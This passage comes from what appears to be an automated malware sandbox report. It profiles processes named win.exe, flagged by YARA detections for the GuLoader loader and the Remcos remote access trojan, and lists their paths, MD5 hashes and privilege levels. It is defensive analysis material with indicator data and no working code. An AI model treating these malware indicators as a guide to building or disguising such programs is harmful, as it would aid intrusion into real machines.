                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000016.00000000.566291257.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                Reputation:low

                Analysis Process: win.exe PID: 2796 Parent PID: 5128

                General

                Start time:20:44:25
                Start date:07/06/2021
                Path:C:\Users\user\AppData\Roaming\win.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\AppData\Roaming\win.exe
                Imagebase:0x400000
                File size:110592 bytes
                MD5 hash:853744502B68E50E6CBAF81FFB3F5CC0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.846829596.00000000023B0000.00000004.00000040.sdmp, Author: Joe Security
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000017.00000000.566645906.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                Reputation:low

                Analysis Process: win.exe PID: 5544 Parent PID: 5852

                General

                Start time:20:44:38
                Start date:07/06/2021
                Path:C:\Users\user\AppData\Roaming\win.exe
                Wow64 process (32bit):true
                Commandline:'C:\Users\user\AppData\Roaming\win.exe'
                Imagebase:0x400000
                File size:110592 bytes
                MD5 hash:853744502B68E50E6CBAF81FFB3F5CC0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000018.00000000.596745893.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000018.00000002.679457919.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                Reputation:low

                Analysis Process: backgroundTaskHost.exe PID: 7080 Parent PID: 792

                General

                Start time:20:45:54
                Start date:07/06/2021
                Path:C:\Windows\System32\backgroundTaskHost.exe
                Wow64 process (32bit):false
                Commandline:'C:\Windows\system32\backgroundTaskHost.exe' -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
                Imagebase:0x7ff614b90000
                File size:19352 bytes
                MD5 hash:B7FC4A29431D4F795BBAB1FB182B759A
                Has elevated privileges:true
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:moderate

                Disassembly

                Code Analysis

                Reset < >